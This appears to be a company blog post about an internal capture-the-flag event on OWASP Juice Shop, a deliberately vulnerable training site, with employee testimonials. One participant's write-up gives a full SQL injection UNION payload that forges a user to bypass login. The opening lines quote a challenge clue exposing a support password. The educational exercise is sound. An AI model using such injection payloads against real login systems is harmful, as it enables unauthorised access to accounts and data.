this.error && &&*/) && console.log("@echipa de suport: Secretul nostru comun este \xeenc\u0103 Caoimhe cu parola de master gol!")
@support team: Our common secret is still Caoimhe with the empty master password!
Caoimhe. A fairly common feminine name in Ireland, Caoimhe is pronounced kee-va and comes from the Irish caomh, meaning dear or noble.
For this challenge, I tried using burp to send back a 200 response but that didn't work.
Then I tried adding ' before the username, which caused an error in the response tab of the inspect tools, and from that, you could see a query:
SELECT * FROM Users WHERE email = '' acc0unt4nt@uice-sh.op' AND password = '098f6bcd4621d373cade4e832627b4f6' AND deletedAt IS NULL
Then using the database schema I created a union SQL and repeated in burp till I got as follows:
' UNION SELECT * FROM (SELECT 21 as 'id', '' as 'username', 'acc0unt4nt@juice-sh.op' as 'email', 'testPass' as 'password', 'accounting' as 'role','' as 'deluxeToken', '' as 'lastLoginIp', 'default.svg' as 'profileImage', '' as 'totpSecret', 1 as 'isActive', '2021-06-05 11:04:10.111 +00:00' as 'createdAt', '2020-06-05 11:04:10.111 +00:00' as 'updatedAt', null as 'deletedAt')--
Finally, we got the authentication token:
Sathya Senthilnathan
Massive thank you Chris for your efforts in organising the capture flag event. It was a great opportunity for me to learn new things on web security and get my hands dirty with some cool security tools like burp suite. I really enjoyed solving the challenges by exploring many things on web security. Especially thank you for your support in bringing back the website when I have accidentally deleted all the products from the juice shop and was completely stuck.
Tim Gill
I have really enjoyed Juice Shop. It's really fun and educational, plus the competitive element of it is really motivating.
Craig Sefton
The thing I found most interesting about the OWASP Juice Shop was what it taught me in general about security: all you need is someone with time and determination, and they can begin to acquire the knowledge they need to penetrate a system. Every piece of information gained about a system is like "leveling up": it allows you further access to further information. Coming into it, I would've thought that protecting your system from a technological perspective - upgrading software, patching vulnerabilities - was key. However, what I really came to appreciate was how equally important it was to try protect the information about your system, including the people who use it or build it.
Dan Mathews
The juice shop has been truly eye-opening. As a relative newcomer to the Engineering world I was only aware of a fraction of the avenues that an attacker has available to them, and yet I was able to explore this new world at my own pace by taking advantage of the introductory challenges to build my confidence, and then progressing to the more advanced challenges when I felt comfortable. The extended descriptions and hints online were also invaluable, and it was possible to navigate them without stumbling across any spoilers.
I must say that it's been an absolute pleasure to see Chris' longstanding passion for cyber security finally find expression at Eagle Eye. By choosing such an engaging format he has brought to life so many key concepts for keeping our company and our clients safe, and his technical implementation and encouragement in the challenge has been outstanding. I'm looking forward to the next project!
Our Capture the Flag competition has been a great success. People soon became drawn in and found themselves hacking away late into the evening to capture those elusive flags.
Acting as hackers in this safe environment has given people a different but necessary perspective on Web Application Security – the perspective of the hacker – and this is far more insightful than any course or presentation could ever be.
Thinking like a hacker is not just a technical mindset, it delves into the psychology of everyday people to catch them off-guard. Security requires a vigilant mindset, and this Capture the Flag activity has created a buzz around the business, inspiring all sorts of conversations about security and has been an important bolt-on activity to all our formal security conventions we apply at Eagle Eye.
We will do more of this in the future and would encourage every software company to think about fun activities like this to create a security-conscious culture.